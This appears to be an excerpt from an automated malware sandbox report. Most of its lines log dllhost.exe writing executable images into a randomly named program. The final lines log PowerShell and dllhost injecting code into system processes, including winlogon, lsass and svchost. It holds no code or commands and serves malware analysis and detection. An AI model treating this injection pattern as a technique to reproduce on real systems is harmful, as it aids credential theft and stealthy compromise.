Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 25A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2840000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 21E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2780000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 27A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2120000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 21B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2490000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 26B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2830000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 3000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 3020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: A90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 22F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2310000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 25E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2C10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1550000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 24B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 24D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 26F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 27E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: A20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: A40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1490000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 22E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 3040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 3060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2240000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 5F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 22F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 9E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 2512A6B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1BEB0A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 253DFF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 22F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 2580 base: 3140000 value: 4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 5752Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 5016Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 1200Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 412Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 945657010Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAF190000Jump to behavior
